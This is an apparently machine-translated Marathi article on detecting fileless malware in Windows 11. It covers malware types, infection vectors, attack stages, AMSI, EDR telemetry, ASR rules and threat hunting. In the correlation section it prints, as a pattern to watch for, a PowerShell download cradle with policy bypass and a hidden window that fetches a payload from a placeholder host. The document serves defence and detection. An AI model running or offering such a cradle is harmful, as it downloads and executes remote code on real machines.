विंडोज ११ मध्ये धोकादायक फाइललेस मालवेअर कसे शोधायचे

¿धोकादायक फाइललेस मालवेअर कसे शोधायचे? फाइललेस हल्ल्याची क्रिया लक्षणीयरीत्या वाढली आहे आणि त्यामुळे परिस्थिती आणखी बिकट झाली आहे, विंडोज ११ रोगप्रतिकारक नाही.हा दृष्टिकोन डिस्कला बायपास करतो आणि मेमरी आणि कायदेशीर सिस्टम टूल्सवर अवलंबून असतो; म्हणूनच सिग्नेचर-आधारित अँटीव्हायरस प्रोग्राम संघर्ष करतात. जर तुम्ही ते शोधण्याचा विश्वसनीय मार्ग शोधत असाल, तर उत्तर एकत्र करणे आहे टेलीमेट्री, वर्तन विश्लेषण आणि विंडोज नियंत्रणे.

सध्याच्या इकोसिस्टममध्ये, पॉवरशेल, डब्ल्यूएमआय किंवा एमश्टाचा गैरवापर करणाऱ्या मोहिमा मेमरी इंजेक्शन्स, डिस्कला "स्पर्श न करता" पर्सिस्टन्स आणि अगदी फर्मवेअर गैरवापरमहत्त्वाचे म्हणजे धोक्याचा नकाशा, हल्ल्याचे टप्पे आणि RAM मध्ये सर्वकाही घडत असतानाही ते कोणते सिग्नल सोडतात हे समजून घेणे.

फाइललेस मालवेअर म्हणजे काय आणि विंडोज ११ मध्ये ते चिंतेचे कारण का आहे?

जेव्हा आपण "फाइललेस" धोक्यांबद्दल बोलतो तेव्हा आपण दुर्भावनापूर्ण कोडचा संदर्भ घेत असतो जो तुम्हाला नवीन एक्झिक्युटेबल जमा करण्याची आवश्यकता नाही. ऑपरेट करण्यासाठी फाइल सिस्टममध्ये. ते सहसा चालू असलेल्या प्रक्रियांमध्ये इंजेक्ट केले जाते आणि RAM मध्ये कार्यान्वित केले जाते, मायक्रोसॉफ्टने स्वाक्षरी केलेल्या इंटरप्रिटर आणि बायनरीजवर अवलंबून (उदा., पॉवरशेल, डब्ल्यूएमआय, रंडल३२, एमएसएचटीएहे तुमचा ठसा कमी करते आणि तुम्हाला फक्त संशयास्पद फाइल्स शोधणाऱ्या इंजिनांना बायपास करण्यास अनुमती देते.

लाँच कमांडमध्ये भेद्यतेचा फायदा घेणारे ऑफिस दस्तऐवज किंवा पीडीएफ देखील या घटनेचा भाग मानले जातात, कारण मेमरीमध्ये अंमलबजावणी सक्रिय करा विश्लेषणासाठी उपयुक्त बायनरीज न सोडता. चा गैरवापर मॅक्रो आणि डीडीई ऑफिसमध्ये, कोड WinWord सारख्या कायदेशीर प्रक्रियांमध्ये चालतो.

हल्लेखोर सोशल इंजिनिअरिंग (फिशिंग, स्पॅम लिंक्स) तांत्रिक सापळ्यांसह एकत्र करतात: वापरकर्त्याच्या क्लिकमुळे एक साखळी सुरू होते ज्यामध्ये स्क्रिप्ट मेमरीमध्ये अंतिम पेलोड डाउनलोड करते आणि कार्यान्वित करते, ट्रेस सोडणे टाळणे डिस्कवर. उद्दिष्टे डेटा चोरीपासून ते रॅन्समवेअर अंमलबजावणीपर्यंत, मूक बाजूच्या हालचालीपर्यंत आहेत.

प्रणालीतील पदचिन्हानुसार प्रकार: 'शुद्ध' ते संकरित पर्यंत

गोंधळात टाकणाऱ्या संकल्पना टाळण्यासाठी, फाइल सिस्टमशी त्यांच्या परस्परसंवादाच्या प्रमाणात धोक्यांना वेगळे करणे उपयुक्त ठरते. हे वर्गीकरण स्पष्ट करते काय टिकून राहते, कोड कुठे राहतो आणि तो कोणत्या खुणा सोडतो?.

प्रकार I: कोणतीही फाइल क्रियाकलाप नाही

पूर्णपणे फाइललेस मालवेअर डिस्कवर काहीही लिहित नाही. एक उत्कृष्ट उदाहरण म्हणजे नेटवर्क भेद्यता (पूर्वीच्या EternalBlue व्हेक्टरप्रमाणे) कर्नल मेमरीमध्ये राहून बॅकडोअर लागू करण्यासाठी (डबलपल्सर सारख्या प्रकरणांमध्ये). येथे, सर्वकाही RAM मध्ये होते आणि फाइल सिस्टममध्ये कोणतेही आर्टिफॅक्ट नाहीत.

दुसरा पर्याय म्हणजे दूषित करणे फर्मवेअर घटकांची संख्या: BIOS/UEFI, नेटवर्क अडॅप्टर, USB पेरिफेरल्स (BadUSB-प्रकारचे तंत्र) किंवा अगदी CPU उपप्रणाली. ते रीस्टार्ट आणि रिइंस्टॉल दरम्यान टिकून राहतात, ज्यामध्ये अतिरिक्त अडचण येते काही उत्पादने फर्मवेअरची तपासणी करतातहे गुंतागुंतीचे हल्ले आहेत, कमी वारंवार होतात, परंतु त्यांच्या गुप्ततेमुळे आणि टिकाऊपणामुळे धोकादायक असतात.

प्रकार II: अप्रत्यक्ष संग्रहण क्रियाकलाप

येथे, मालवेअर स्वतःचे एक्झिक्युटेबल "सोडत" नाही, परंतु सिस्टम-मॅनेज्ड कंटेनर वापरते जे मूलतः फाइल्स म्हणून साठवले जातात. उदाहरणार्थ, बॅकडोअर जे पॉवरशेल आदेश WMI रिपॉझिटरीमध्ये आणि इव्हेंट फिल्टर्ससह त्याची अंमलबजावणी सुरू करा. बायनरीज न टाकता कमांड लाइनवरून ते स्थापित करणे शक्य आहे, परंतु WMI रिपॉझिटरी डिस्कवर एक वैध डेटाबेस म्हणून राहते, ज्यामुळे सिस्टमवर परिणाम न करता ते साफ करणे कठीण होते.

व्यावहारिक दृष्टिकोनातून ते फाइललेस मानले जातात, कारण ते कंटेनर (WMI, रजिस्ट्री, इ.) हे क्लासिक डिटेटेबल एक्झिक्युटेबल नाही. आणि त्याची साफसफाई करणे क्षुल्लक नाही. परिणाम: थोडेसे "पारंपारिक" ट्रेससह गुप्तपणे टिकून राहणे.

प्रकार III: कार्य करण्यासाठी फायली आवश्यक आहेत.

काही प्रकरणांमध्ये अ 'फाइललेस' चिकाटी तार्किक पातळीवर, त्यांना फाइल-आधारित ट्रिगरची आवश्यकता असते. याचे सामान्य उदाहरण म्हणजे कोव्ह्टर: ते रँडम एक्सटेंशनसाठी शेल क्रियापद नोंदणीकृत करते; जेव्हा त्या एक्सटेंशनसह फाइल उघडली जाते, तेव्हा mshta.exe वापरून एक लहान स्क्रिप्ट लाँच केली जाते, जी रजिस्ट्रीमधील दुर्भावनापूर्ण स्ट्रिंगची पुनर्रचना करते.

युक्ती अशी आहे की यादृच्छिक विस्तारांसह या "बिट" फायलींमध्ये विश्लेषण करण्यायोग्य पेलोड नसतो आणि कोडचा मोठा भाग यामध्ये असतो नोंदणी (दुसरा कंटेनर). म्हणूनच त्यांना प्रभावात फाइललेस म्हणून वर्गीकृत केले आहे, जरी ते ट्रिगर म्हणून एक किंवा अधिक डिस्क आर्टिफॅक्टवर अवलंबून असले तरी.

संसर्गाचे वाहक आणि 'यजमान': ते कुठे प्रवेश करते आणि कुठे लपते

शोध सुधारण्यासाठी, प्रवेश बिंदू आणि संसर्गाचे यजमान यांचे मॅपिंग करणे अत्यंत आवश्यक आहे. हा दृष्टिकोन डिझाइन करण्यास मदत करतो विशिष्ट नियंत्रणे योग्य टेलीमेट्रीला प्राधान्य द्या.

शोषण

• फाइल-आधारित (प्रकार III): कागदपत्रे, एक्झिक्युटेबल्स, लेगसी फ्लॅश/जावा फाइल्स किंवा LNK फाइल्स शेलकोड मेमरीमध्ये लोड करण्यासाठी ब्राउझर किंवा त्यांच्यावर प्रक्रिया करणाऱ्या इंजिनचा वापर करू शकतात. पहिला वेक्टर एक फाइल आहे, परंतु पेलोड RAM मध्ये जातो.
• नेटवर्क-आधारित (प्रकार I): भेद्यतेचा फायदा घेणारे पॅकेज (उदा. SMB मध्ये) युजरलँड किंवा कर्नलमध्ये अंमलबजावणी साध्य करते. WannaCry ने हा दृष्टिकोन लोकप्रिय केला. थेट मेमरी लोड नवीन फाइलशिवाय.

हार्डवेअर

• डिव्हाइसेस (प्रकार I): डिस्क किंवा नेटवर्क कार्ड फर्मवेअर बदलले जाऊ शकते आणि कोड सादर केला जाऊ शकतो. तपासणी करणे कठीण असते आणि OS च्या बाहेरही ते टिकून राहते.
• सीपीयू आणि व्यवस्थापन उपप्रणाली (प्रकार I): इंटेलच्या ME/AMT सारख्या तंत्रज्ञानाने मार्ग दाखवले आहेत ऑपरेटिंग सिस्टमच्या बाहेर नेटवर्किंग आणि अंमलबजावणीते अतिशय कमी पातळीवर हल्ला करते, ज्यामध्ये गुप्ततेची क्षमता जास्त असते.
• युएसबी (प्रकार I): BadUSB तुम्हाला कीबोर्ड किंवा NIC ची नक्कल करण्यासाठी USB ड्राइव्ह रीप्रोग्राम करण्याची आणि कमांड लाँच करण्याची किंवा ट्रॅफिक रीडायरेक्ट करण्याची परवानगी देते.
• बीओओएस / यूईएफआय (प्रकार I): दुर्भावनापूर्ण फर्मवेअर रीप्रोग्रामिंग (मेब्रोमी सारख्या प्रकरणांमध्ये) जे विंडोज बूट होण्यापूर्वी चालते.
• हायपरवाइजर (प्रकार I): ऑपरेटिंग सिस्टमची उपस्थिती लपविण्यासाठी त्याच्या खाली एक मिनी-हायपरवाइजर बसवणे. दुर्मिळ, परंतु हायपरवाइजर रूटकिटच्या स्वरूपात आधीच पाहिले गेले आहे.

अंमलबजावणी आणि इंजेक्शन

• फाइल-आधारित (प्रकार III): EXE/DLL/LNK किंवा नियोजित कार्ये जी कायदेशीर प्रक्रियांमध्ये इंजेक्शन लाँच करतात.
• मॅक्रो (प्रकार III): ऑफिसमधील VBA वापरकर्त्याच्या संमतीने फसवणुकीद्वारे संपूर्ण रॅन्समवेअरसह पेलोड डीकोड आणि कार्यान्वित करू शकते.
• स्क्रिप्ट (प्रकार II): फाइल, कमांड लाइन वरून पॉवरशेल, व्हीबीएसस्क्रिप्ट किंवा जेस्क्रिप्ट, सेवा, नोंदणी किंवा WMIआक्रमणकर्ता डिस्कला स्पर्श न करता रिमोट सेशनमध्ये स्क्रिप्ट टाइप करू शकतो.
• बूट रेकॉर्ड (एमबीआर/बूट) (प्रकार II): पेट्या सारखी कुटुंबे स्टार्टअपवर नियंत्रण मिळविण्यासाठी बूट सेक्टर ओव्हरराईट करतात. ते फाइल सिस्टमच्या बाहेर आहे, परंतु ते OS आणि आधुनिक उपायांसाठी उपलब्ध आहे जे ते पुनर्संचयित करू शकतात.

फाइललेस हल्ले कसे कार्य करतात: टप्पे आणि सिग्नल

जरी ते एक्झिक्युटेबल फाइल्स सोडत नसले तरी, मोहिमा टप्प्याटप्प्याने तर्कशास्त्राचे पालन करतात. त्यांना समजून घेतल्याने देखरेख करणे शक्य होते. घटना आणि प्रक्रियांमधील संबंध जे एक छाप सोडतात.

• सुरुवातीचा प्रवेशलिंक्स किंवा अटॅचमेंट्स, धोक्यात आलेल्या वेबसाइट्स किंवा चोरीला गेलेल्या क्रेडेन्शियल्स वापरून फिशिंग हल्ले. अनेक साखळ्या ऑफिस डॉक्युमेंटने सुरू होतात जे कमांड ट्रिगर करते. पॉवरशेल.
• चिकाटी: WMI द्वारे मागील दरवाजे (फिल्टर आणि सबस्क्रिप्शन), रजिस्ट्री एक्झिक्युशन कीज किंवा शेड्यूल केलेली कामे जी नवीन दुर्भावनापूर्ण फाइलशिवाय स्क्रिप्ट पुन्हा लाँच करतात.
• एक्सफिल्ट्रेशनएकदा माहिती गोळा केली की, ती ट्रॅफिक मिसळण्यासाठी विश्वसनीय प्रक्रिया (ब्राउझर, पॉवरशेल, बिट्सअ‍ॅडमिन) वापरून नेटवर्कमधून बाहेर पाठवली जाते.

हा नमुना विशेषतः कपटी आहे कारण हल्ला निर्देशक ते सामान्यतेमध्ये लपतात: कमांड-लाइन युक्तिवाद, प्रक्रिया साखळी, असामान्य आउटबाउंड कनेक्शन किंवा इंजेक्शन API मध्ये प्रवेश.

सामान्य तंत्रे: मेमरीपासून रेकॉर्डिंगपर्यंत

कलाकार विविध प्रकारच्या गोष्टींवर अवलंबून असतात पद्धती जे चोरीला अनुकूल करते. प्रभावी शोध सक्रिय करण्यासाठी सर्वात सामान्य जाणून घेणे उपयुक्त ठरते.

• आठवणीत राहणारा: सक्रियतेची वाट पाहणाऱ्या विश्वसनीय प्रक्रियेच्या जागेत पेलोड लोड करणे. रूटकिट्स आणि हुक कर्नलमध्ये, ते लपण्याची पातळी वाढवतात.
• रजिस्ट्रीमध्ये सातत्यएन्क्रिप्टेड ब्लॉब्स कीजमध्ये सेव्ह करा आणि त्यांना कायदेशीर लाँचर (mshta, rundll32, wscript) वरून रिहायड्रेट करा. क्षणभंगुर इंस्टॉलर त्याचा फूटप्रिंट कमी करण्यासाठी स्वतःला नष्ट करू शकतो.
• क्रेडेन्शियल फिशिंगचोरलेल्या वापरकर्तानाव आणि पासवर्ड वापरून, हल्लेखोर रिमोट शेल आणि प्लांट्स चालवतो सायलेंट अ‍ॅक्सेस रजिस्ट्री किंवा WMI मध्ये.
• 'फाइललेस' रॅन्समवेअरएन्क्रिप्शन आणि C2 कम्युनिकेशन हे RAM मधून व्यवस्थित केले जातात, ज्यामुळे नुकसान दिसून येईपर्यंत शोधण्याच्या संधी कमी होतात.
• ऑपरेटिंग किट: वापरकर्त्याने क्लिक केल्यानंतर भेद्यता शोधणाऱ्या आणि मेमरी-ओन्ली पेलोड तैनात करणाऱ्या स्वयंचलित साखळ्या.
• कोड असलेले दस्तऐवज: मॅक्रो आणि DDE सारखे यंत्रणा जे एक्झिक्युटेबल डिस्कवर सेव्ह न करता कमांड ट्रिगर करतात.

उद्योग अभ्यासांनी आधीच लक्षणीय शिखरे दर्शविली आहेत: २०१८ च्या एका कालावधीत, अ ९०% पेक्षा जास्त वाढ स्क्रिप्ट-आधारित आणि पॉवरशेल साखळी हल्ल्यांमध्ये, हे लक्षण आहे की वेक्टरला त्याच्या प्रभावीतेसाठी प्राधान्य दिले जाते.

कंपन्या आणि पुरवठादारांसाठी आव्हान: ब्लॉक करणे पुरेसे का नाही

पॉवरशेल अक्षम करणे किंवा मॅक्रो कायमचे बंदी घालणे मोहक ठरेल, परंतु तुम्ही ऑपरेशन खंडित कराल.पॉवरशेल हा आधुनिक प्रशासनाचा आधारस्तंभ आहे आणि व्यवसायात ऑफिस आवश्यक आहे; डोळे बंद करून ब्लॉक करणे अनेकदा शक्य नसते.

शिवाय, मूलभूत नियंत्रणे बायपास करण्याचे मार्ग आहेत: DLL आणि rundll32 द्वारे PowerShell चालवणे, EXE मध्ये स्क्रिप्ट पॅकेज करणे, पॉवरशेलची तुमची स्वतःची प्रत आणा. किंवा प्रतिमांमध्ये स्क्रिप्ट लपवा आणि त्या मेमरीमध्ये काढा. म्हणून, बचाव केवळ साधनांचे अस्तित्व नाकारण्यावर आधारित असू शकत नाही.

आणखी एक सामान्य चूक म्हणजे संपूर्ण निर्णय क्लाउडवर सोपवणे: जर एजंटला सर्व्हरकडून प्रतिसादाची वाट पहावी लागली, तुम्ही रिअल-टाइम प्रतिबंध गमावतामाहिती समृद्ध करण्यासाठी टेलीमेट्री डेटा अपलोड केला जाऊ शकतो, परंतु कमी करणे अंतिम टप्प्यावर होणे आवश्यक आहे.

विंडोज ११ मध्ये फाइललेस मालवेअर कसे शोधायचे: टेलीमेट्री आणि वर्तन

जिंकण्याची रणनीती अशी आहे की प्रक्रिया आणि मेमरी मॉनिटर कराफाइल्स नाही. दुर्भावनापूर्ण वर्तन हे फाइलच्या स्वरूपापेक्षा अधिक स्थिर असतात, ज्यामुळे ते प्रतिबंधक इंजिनसाठी आदर्श बनतात.

• एएमएसआय (अँटीमालवेअर स्कॅन इंटरफेस)ते पॉवरशेल, व्हीबीस्क्रिप्ट किंवा जेस्क्रिप्ट स्क्रिप्ट्सना मेमरीमध्ये डायनॅमिकली बनवलेले असतानाही इंटरसेप्ट करते. एक्झिक्युशनपूर्वी अस्पष्ट स्ट्रिंग्स कॅप्चर करण्यासाठी उत्कृष्ट.
• प्रक्रिया देखरेख: सुरुवात/समाप्ती, पीआयडी, पालक आणि मुले, मार्ग, कमांड लाइन्स आणि संपूर्ण कथा समजून घेण्यासाठी हॅश, तसेच फाशीची झाडे.
• स्मृती विश्लेषण: डिस्कला स्पर्श न करता इंजेक्शन, रिफ्लेक्टिव्ह किंवा पीई लोड शोधणे आणि असामान्य एक्झिक्युटेबल क्षेत्रांचा आढावा.
• स्टार्टर सेक्टर संरक्षण: छेडछाड झाल्यास MBR/EFI चे नियंत्रण आणि पुनर्संचयित करणे.

मायक्रोसॉफ्ट इकोसिस्टममध्ये, डिफेंडर फॉर एंडपॉइंट एएमएसआय एकत्र करते, वर्तन निरीक्षणमेमरी स्कॅनिंग आणि क्लाउड-आधारित मशीन लर्निंगचा वापर नवीन किंवा अस्पष्ट प्रकारांविरुद्ध शोध मोजण्यासाठी केला जातो. इतर विक्रेते कर्नल-रेसिडेंट इंजिनसह समान दृष्टिकोन वापरतात.

सहसंबंधाचे वास्तववादी उदाहरण: दस्तऐवज ते पॉवरशेल पर्यंत

कल्पना करा की अशी साखळी जिथे आउटलुक एक संलग्नक डाउनलोड करते, वर्ड दस्तऐवज उघडते, सक्रिय सामग्री सक्षम केली जाते आणि पॉवरशेल संशयास्पद पॅरामीटर्ससह लाँच केले जाते. योग्य टेलीमेट्री दर्शवेल की कमांड लाइन (उदा., एक्झिक्युशनपॉलिसी बायपास, लपलेली विंडो), अविश्वसनीय डोमेनशी कनेक्ट करणे आणि अ‍ॅपडेटामध्ये स्वतः स्थापित होणारी चाइल्ड प्रक्रिया तयार करणे.

स्थानिक संदर्भ असलेला एजंट सक्षम आहे थांबा आणि उलट करा SIEM ला सूचित करण्याव्यतिरिक्त किंवा ईमेल/एसएमएस द्वारे मॅन्युअल हस्तक्षेपाशिवाय दुर्भावनापूर्ण क्रियाकलाप. काही उत्पादने रूट कॉज अॅट्रिब्यूशन लेयर (स्टोरीलाइन-प्रकार मॉडेल) जोडतात, जे दृश्यमान प्रक्रियेकडे (आउटलुक/वर्ड) निर्देशित करत नाही, तर संपूर्ण दुर्भावनापूर्ण धागा आणि त्याची उत्पत्ती प्रणालीची व्यापक स्वच्छता करण्यासाठी झाली.

लक्ष ठेवण्यासाठी एक सामान्य कमांड पॅटर्न असा दिसू शकतो: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');तर्कशास्त्र ही अचूक स्ट्रिंग नाही, पण सिग्नलचा संच: पॉलिसी बायपास, लपलेली विंडो, क्लिअर डाउनलोड आणि इन-मेमरी एक्झिक्युशन.

AMSI, पाइपलाइन आणि प्रत्येक अभिनेत्याची भूमिका: शेवटच्या बिंदूपासून SOC पर्यंत

स्क्रिप्ट कॅप्चरच्या पलीकडे, एक मजबूत आर्किटेक्चर तपास आणि प्रतिसाद सुलभ करणारे चरण आयोजित करते. भार अंमलात आणण्यापूर्वी जितके जास्त पुरावे असतील तितके चांगले., सर्वोत्तम.

• स्क्रिप्ट इंटरसेप्शनAMSI मालवेअर पाइपलाइनमध्ये स्थिर आणि गतिमान विश्लेषणासाठी सामग्री (जरी ती लगेच तयार केली गेली असली तरीही) वितरित करते.
• प्रक्रिया कार्यक्रमपीआयडी, बायनरी, हॅश, रूट्स आणि इतर डेटा गोळा केला जातो. वितर्क, अंतिम भारापर्यंत नेणारे प्रक्रिया वृक्ष स्थापित करणे.
• शोध आणि अहवाल देणेशोध उत्पादन कन्सोलवर प्रदर्शित केले जातात आणि मोहिमेच्या दृश्यासाठी नेटवर्क प्लॅटफॉर्मवर (NDR) पाठवले जातात.
• वापरकर्ता हमीजरी स्क्रिप्ट मेमरीमध्ये इंजेक्ट केली असली तरी, फ्रेमवर्क AMSI ते अडवते. विंडोजच्या सुसंगत आवृत्त्यांमध्ये.
• प्रशासक क्षमता: स्क्रिप्ट तपासणी सक्षम करण्यासाठी धोरण कॉन्फिगरेशन, वर्तन-आधारित अवरोधन आणि कन्सोलवरून अहवाल तयार करणे.
• सामाजिक कार्य: इतिहास पुन्हा तयार करण्यासाठी कलाकृतींचे निष्कर्षण (VM UUID, OS आवृत्ती, स्क्रिप्ट प्रकार, इनिशिएटर प्रक्रिया आणि त्याचे मूळ, हॅश आणि कमांड लाइन) आणि लिफ्ट नियम भविष्य

जेव्हा प्लॅटफॉर्म निर्यात करण्याची परवानगी देतो मेमरी बफर अंमलबजावणीशी संबंधित, संशोधक नवीन शोध निर्माण करू शकतात आणि समान प्रकारांविरुद्ध संरक्षण समृद्ध करू शकतात.

विंडोज ११ मध्ये व्यावहारिक उपाय: प्रतिबंध आणि शिकार

मेमरी इन्स्पेक्शन आणि एएमएसआयसह ईडीआर असण्याव्यतिरिक्त, विंडोज ११ तुम्हाला अटॅक स्पेस बंद करण्यास आणि दृश्यमानता सुधारण्यास अनुमती देते स्थानिक नियंत्रणे.

• पॉवरशेलमध्ये नोंदणी आणि निर्बंधस्क्रिप्ट ब्लॉक लॉगिंग आणि मॉड्यूल लॉगिंग सक्षम करते, शक्य असेल तेथे प्रतिबंधित मोड लागू करते आणि वापर नियंत्रित करते बायपास/लपवलेले.
• अटॅक सरफेस रिडक्शन (ASR) नियम: ऑफिस प्रक्रियांद्वारे स्क्रिप्ट लाँच अवरोधित करते आणि WMI गैरवापर/ गरज नसताना PSExec.
• ऑफिस मॅक्रो धोरणे: डीफॉल्टनुसार, अंतर्गत मॅक्रो साइनिंग आणि कठोर विश्वास सूची अक्षम करते; लेगसी DDE प्रवाहांचे निरीक्षण करते.
• WMI ऑडिट आणि रजिस्ट्री: इव्हेंट सबस्क्रिप्शन आणि ऑटोमॅटिक एक्झिक्युशन की (रन, रनऑन्स, विनलॉगॉन) तसेच टास्क क्रिएशनचे निरीक्षण करते. नियोजित.
• स्टार्टअप संरक्षण: सुरक्षित बूट सक्रिय करते, MBR/EFI अखंडता तपासते आणि स्टार्टअपमध्ये कोणतेही बदल नाहीत याची पडताळणी करते.
• पॅचिंग आणि कडक करणे: ब्राउझर, ऑफिस घटक आणि नेटवर्क सेवांमधील शोषण करण्यायोग्य भेद्यता बंद करते.
• जागरूकता: वापरकर्त्यांना आणि तांत्रिक टीमना फिशिंग आणि सिग्नलमध्ये प्रशिक्षण देते गुप्त फाशी.

शिकार करण्यासाठी, खालील प्रश्नांवर लक्ष केंद्रित करा: पॉवरशेल/एमएसएचटीए कडे ऑफिसद्वारे प्रक्रिया तयार करणे, युक्तिवाद डाउनलोडस्ट्रिंग/डाउनलोडफाइलस्पष्ट अस्पष्टता, परावर्तक इंजेक्शन आणि संशयास्पद TLDs ला आउटबाउंड नेटवर्कसह स्क्रिप्ट्स. आवाज कमी करण्यासाठी प्रतिष्ठा आणि वारंवारतेसह या सिग्नलचा क्रॉस-रेफरन्स करा.

आज प्रत्येक इंजिन काय शोधू शकते?

मायक्रोसॉफ्टचे एंटरप्राइझ सोल्यूशन्स एएमएसआय, वर्तणुकीय विश्लेषणे, स्मृती तपासा आणि बूट सेक्टर संरक्षण, तसेच उदयोन्मुख धोक्यांविरुद्ध स्केल करण्यासाठी क्लाउड-आधारित ML मॉडेल्स. इतर विक्रेते बदलांच्या स्वयंचलित रोलबॅकसह दुर्भावनापूर्ण आणि सौम्य सॉफ्टवेअरमध्ये फरक करण्यासाठी कर्नल-स्तरीय देखरेख लागू करतात.

यावर आधारित दृष्टिकोन फाशीच्या कथा हे तुम्हाला मूळ कारण ओळखण्यास अनुमती देते (उदाहरणार्थ, साखळी सुरू करणारा आउटलुक संलग्नक) आणि संपूर्ण वृक्ष कमी करण्यास मदत करते: स्क्रिप्ट्स, की, टास्क आणि इंटरमीडिएट बायनरी, दृश्यमान लक्षणात अडकणे टाळते.

सामान्य चुका आणि त्या कशा टाळायच्या

पर्यायी व्यवस्थापन योजनेशिवाय पॉवरशेल ब्लॉक करणे केवळ अव्यवहार्यच नाही तर असे काही आहेत ते अप्रत्यक्षपणे वापरण्याचे मार्गमॅक्रोजनाही हेच लागू होते: एकतर तुम्ही ते धोरणे आणि स्वाक्षऱ्यांनी व्यवस्थापित करा, नाहीतर व्यवसायाचे नुकसान होईल. टेलीमेट्री आणि वर्तणुकीच्या नियमांवर लक्ष केंद्रित करणे चांगले.

आणखी एक सामान्य चूक म्हणजे असे मानणे की अॅप्लिकेशन्स व्हाइटलिस्ट केल्याने सर्वकाही सोडवले जाते: फाइललेस तंत्रज्ञान यावरच अवलंबून असते. विश्वसनीय ॲप्सनियंत्रणाने ते काय करतात आणि ते कसे संबंधित आहेत याचे निरीक्षण केले पाहिजे, फक्त त्यांना परवानगी आहे की नाही हे पाहण्यापेक्षा.

वरील सर्व गोष्टींसह, जेव्हा तुम्ही खरोखर काय महत्त्वाचे आहे यावर लक्ष ठेवता तेव्हा फाइललेस मालवेअर "भूत" राहात नाही: वर्तन, स्मृती आणि मूळ प्रत्येक अंमलबजावणीचे. AMSI, रिच प्रोसेस टेलीमेट्री, नेटिव्ह विंडोज ११ कंट्रोल्स आणि बिहेवियरल अॅनालिसिससह EDR लेयर एकत्र केल्याने तुम्हाला फायदा मिळतो. समीकरणात मॅक्रो आणि पॉवरशेलसाठी वास्तववादी धोरणे, WMI/रजिस्ट्री ऑडिटिंग आणि हंटिंग जोडा जे कमांड लाइन्स आणि प्रोसेस ट्रींना प्राधान्य देतात आणि तुमच्याकडे एक बचाव आहे जो या साखळ्या आवाज येण्यापूर्वीच तोडतो.